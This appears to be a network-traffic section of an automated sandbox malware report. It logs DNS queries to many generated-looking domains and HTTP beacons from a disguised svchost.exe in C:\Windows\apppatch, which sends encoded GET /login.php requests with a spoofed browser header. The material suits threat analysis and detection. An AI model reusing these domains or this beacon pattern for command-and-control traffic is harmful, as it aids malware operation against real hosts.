Aug 23, 2024 18:49:04.358392954 CEST	1.1.1.1	192.168.2.4	0x5cd7	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358401060 CEST	1.1.1.1	192.168.2.4	0x6bf2	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358409882 CEST	1.1.1.1	192.168.2.4	0x617f	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358418941 CEST	1.1.1.1	192.168.2.4	0x3c05	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358428001 CEST	1.1.1.1	192.168.2.4	0xb5cf	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358515978 CEST	1.1.1.1	192.168.2.4	0xd070	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358525038 CEST	1.1.1.1	192.168.2.4	0x6867	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358531952 CEST	1.1.1.1	192.168.2.4	0x792f	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.360537052 CEST	1.1.1.1	192.168.2.4	0x5bed	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.363696098 CEST	1.1.1.1	192.168.2.4	0x2b10	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.375580072 CEST	1.1.1.1	192.168.2.4	0x4e75	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.375580072 CEST	1.1.1.1	192.168.2.4	0x4e75	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.464183092 CEST	1.1.1.1	192.168.2.4	0xd923	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.473449945 CEST	1.1.1.1	192.168.2.4	0xcab4	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.473612070 CEST	1.1.1.1	192.168.2.4	0x29c4	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.476619959 CEST	1.1.1.1	192.168.2.4	0xfe34	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.478456020 CEST	1.1.1.1	192.168.2.4	0x96f2	Name error (3)	vojymic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.482800007 CEST	1.1.1.1	192.168.2.4	0xa376	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.485553026 CEST	1.1.1.1	192.168.2.4	0xb898	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.485553026 CEST	1.1.1.1	192.168.2.4	0xb898	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.520848989 CEST	1.1.1.1	192.168.2.4	0xbfc7	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.520848989 CEST	1.1.1.1	192.168.2.4	0xbfc7	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.585969925 CEST	1.1.1.1	192.168.2.4	0x2601	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.714740038 CEST	1.1.1.1	192.168.2.4	0x8521	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:49:04.714740038 CEST	1.1.1.1	192.168.2.4	0x8521	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:49:04.714740038 CEST	1.1.1.1	192.168.2.4	0x8521	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:05.473535061 CEST	1.1.1.1	192.168.2.4	0x24c8	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:49:05.473535061 CEST	1.1.1.1	192.168.2.4	0x24c8	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:49:05.473535061 CEST	1.1.1.1	192.168.2.4	0x24c8	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.comuser-agent:

qegyhig.com

lysyvan.com

gahyqah.com

lyvyxor.com

qetyfuv.com

puzylyp.com

galyqaz.com

vocyzit.com

vonypom.com

lymyxid.com

vojyqem.com

lysyfyj.com

www.gahyqah.com

gatyfus.com

ww3.galyqaz.com

gadyniw.com

pupydeq.com

pupycag.com

lyrysor.com

106.15.137.66:8001

galynuh.com

gadyciz.com

vofycot.com

lyxynyx.com

qegyval.com

ww16.vofycot.com

ww25.lyxynyx.com

qetyhyg.com

gatyhub.com

lygyvuj.com

gahyhiz.com

qexyhuv.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.96.3	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:00.753926039 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.518945932 CEST	797	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSpO%2FKj%2BmaUX70Sx1ww44N%2BZ5WzqsjqV7mcRu03L2G1GhX8frrgSp7mIaB8rplocEY4pKTBHaM%2F9%2FhRa1v32FF8dlS%2Bf6NALFr1DXNcREasIqWKIADXoWlsrHPg4sw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c95006e8043b1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:47:02.889772892 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:03.985028982 CEST	791	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:47:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkARy6yodomNNBXrkSLWybUlu6UF7FxoOIYwnOeKElWTTN%2Bj2wHm3NYKdyuJnRkqol85EVky7pfU6te9J3ngXdcGY6xBjUrH2wL%2BU4wAeml%2BjBA6B8xDksyAbIuPSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c950badd343b1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:47:51.468729973 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:51.839237928 CEST	793	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:47:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G574r9aE%2Fs%2BgaHvqI7SdEVGdVzvsXLj4kLT0B7f63KKo14PigfEvJGPLZAaVcragpK74TTwnx7%2FwmRyxc0cor1q2sixsOVGgYfYhh4%2FgiaH2rCYsToffq77cGlm0Jw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c963b095143b1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:47:53.028350115 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:53.392613888 CEST	797	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:47:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COGxsqIa016UoHHkGcgN6ui9paZh6Faw2qKn2d%2BVQZqrrEc%2Fd9eBPGcs6rLqSLDFh7dwCYCO1kGE76nlCE%2Bp2RZkAz3ckr%2F%2BVCPpoDJuMEwR39ke14FLoQzgVAIq%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c9644bd5e43b1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	162.255.119.102	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:00.843699932 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.607887983 CEST	303	IN	HTTP/1.1 302 Found Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Location: http://www.gahyqah.com/login.php X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	208.100.26.245	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:00.931417942 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.471458912 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:01.480647087 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.618794918 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:51.401537895 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:51.546242952 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:47:51 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:51.547452927 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:51.662473917 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:47:51 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:00.956464052 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.471368074 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	3.64.163.50	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:00.956649065 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
